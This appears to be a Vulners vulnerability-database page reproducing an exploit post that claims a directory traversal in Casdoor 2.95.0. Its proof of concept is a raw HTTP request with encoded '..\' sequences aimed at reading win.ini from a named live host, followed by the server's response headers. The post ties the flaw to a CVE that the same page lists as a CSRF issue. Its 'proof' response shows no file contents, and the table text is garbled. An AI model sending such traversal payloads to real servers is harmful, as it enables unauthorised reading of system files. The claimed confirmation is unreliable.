| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2023-34927 | 22 Jun 202313:15 | β | attackerkb | |
| Casdoor θ·¨η«θ―·ζ±δΌͺι ζΌζ΄ | 22 Jun 202300:00 | β | cnnvd | |
| CVE-2023-34927 | 22 Jun 202300:00 | β | cve | |
| CVE-2023-34927 | 22 Jun 202300:00 | β | cvelist | |
| Casdoor < v1.331.0 - '/api/set-password' CSRF | 2 Apr 202400:00 | β | exploitdb | |
| Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF) | 16 Sep 202500:00 | β | exploitdb | |
| Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF) | 29 Oct 202500:00 | β | exploitdb | |
| EUVD-2023-1883 | 3 Oct 202520:07 | β | euvd | |
| Casdoor Cross-Site Request Forgery vulnerability | 22 Jun 202315:30 | β | github | |
| CVE-2023-34927 | 22 Jun 202313:15 | β | nvd |
=============================================================================================================================================
| # Title : Casdoor 2.95.0 Directory Traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://casdoor.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211122/ & CVE-2023-34927
[+] Summary : The vulnerability confirmed here is a Directory Traversal affecting an application running on Casdoor 2.95.0
[+] POC :
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: door.casdoor.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain; charset=utf-8
Date: Sat, 06 Dec 2025 14:35:45 GMT
Last-Modified: Sat, 08 May 2021 08:18:31 GMT
Server: beegoServer:1.12.3
Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly
Original-Content-Encoding: gzip
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation